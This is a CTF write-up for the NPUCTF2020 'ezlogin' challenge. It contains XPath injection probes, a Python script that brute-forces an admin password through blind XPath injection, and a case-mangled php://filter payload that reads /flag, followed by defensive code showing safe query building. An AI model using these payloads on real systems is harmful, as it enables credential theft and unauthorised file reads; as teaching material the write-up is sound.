[NPUCTF2020]ezlogin
Knowledge points
- Learning XPath injection
Solution steps
Capture the request with Burp Suite; the login data is submitted in XML format.
Put the injection payload from the article into it: 'or count(/)=1 or ''='
It responds with "非法操作" (illegal operation), so this is probably XPath injection.
Change the 1 to 2: 'or count(/)=2 or ''='
Now it responds with "用户名或密码错误" (wrong username or password), so this should be boolean-based blind injection.
Go straight to an injection script:

```python
import requests
import time
import re

s = requests.session()
url = 'http://4b91bfcd-148c-46cc-b9dd-0903599541a9.node3.buuoj.cn/login.php'
head = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
    "Content-Type": "application/xml"
}
# The login page embeds a hidden token that has to be sent back with every request
find = re.compile('<input type="hidden" id="token" value="(.*?)" />')
strs = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
flag = ''
for i in range(1, 100):
    for j in strs:
        r = s.post(url=url)
        if r.status_code != 200:
            # BUU rejects bursts of requests; wait and fetch the token again
            time.sleep(3)
            r = s.post(url=url)
        token = find.findall(r.text)
        # Guess the root node name
        # payload_1 = "<username>'or substring(name(/*[1]), {}, 1)='{}' or ''='</username><password>3123</password><token>{}</token>".format(i, j, token[0])
        # Guess the child node name
        # payload_2 = "<username>'or substring(name(/root/*[1]), {}, 1)='{}' or ''='</username><password>3123</password><token>{}</token>".format(i, j, token[0])
        # Guess the node under accounts
        # payload_3 = "<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}' or ''='</username><password>3123</password><token>{}</token>".format(i, j, token[0])
        # Guess the user node
        # payload_4 = "<username>'or substring(name(/root/accounts/user/*[2]), {}, 1)='{}' or ''='</username><password>3123</password><token>{}</token>".format(i, j, token[0])
        # Extract the username and password
        # payload_username = "<username>'or substring(/root/accounts/user[2]/username/text(), {}, 1)='{}' or ''='</username><password>3123</password><token>{}</token>".format(i, j, token[0])
        payload_password = "<username>'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}' or ''='</username><password>3123</password><token>{}</token>".format(i, j, token[0])
        print(payload_password)
        r = s.post(url=url, headers=head, data=payload_password)
        print(r.text)
        if "非法操作" in r.text:
            # Condition true: this character is correct, move on to the next position
            flag += j
            print(flag)
            break
        if "用户名或密码错误!" in r.text:
            break
print(flag)
```
Because of the BUU platform, just add a sleep to prevent errors.
This yields admin's account and password; look the password hash up with an online MD5 decoder to get gtfly123.
After logging in as admin, a hint says the flag is at /flag.
The URL looks suspicious; use a PHP stream wrapper to read /flag.
After some attempts, php and base turn out to be filtered; this can be bypassed with uppercase letters.
Payload:
phP://filter/convert.bAse64-encode/resource=/flag
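As an added illustration (not code from this write-up or from the challenge), the Python below puts the unsafe query construction that the blind injection above relies on next to a quoted-literal build that turns the same probe into inert text, and adds an allowlist check for the file parameter that has no case-sensitivity gap for phP://filter to slip through. The XML samples, the `<r>` wrapper element and the `/root/accounts/user` query shape are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample bodies in the challenge's XML login format (not captured
# from the server); the second one is the count(/) probe from the write-up.
NORMAL_LOGIN = "<r><username>alice</username><password>s3cret</password></r>"
PROBE_LOGIN = "<r><username>'or count(/)=2 or ''='</username><password>x</password></r>"


def xpath_literal(value):
    """Wrap untrusted text as an XPath 1.0 string literal that cannot close the
    surrounding quotes. XPath 1.0 has no escape sequences, so a value holding
    both quote kinds has to be assembled with concat()."""
    if "'" not in value:
        return "'%s'" % value
    if '"' not in value:
        return '"%s"' % value
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join("'%s'" % p for p in parts) + ")"


def vulnerable_login_query(xml_body):
    """The pattern the write-up exploits: raw interpolation inside single quotes,
    so a leading ' in the username ends the literal and injects XPath."""
    root = ET.fromstring(xml_body)
    return "/root/accounts/user[username='%s' and password='%s']" % (
        root.findtext("username") or "", root.findtext("password") or "")


def build_login_query(xml_body):
    """Hardened form: both fields become proper literals, so the probe is
    compared as a string instead of being evaluated as a predicate."""
    root = ET.fromstring(xml_body)
    user = root.findtext("username") or ""
    pwd = root.findtext("password") or ""
    return "/root/accounts/user[username=%s and password=%s]" % (
        xpath_literal(user), xpath_literal(pwd))


def is_plain_resource(path):
    """Allowlist check for the file parameter. The challenge's blocklist compared
    case-sensitively and so missed phP:// and bAse64; an allowlist of path
    characters has no case to get wrong and rejects every scheme and wrapper."""
    return re.fullmatch(r"[A-Za-z0-9_./-]+", path) is not None and ".." not in path
```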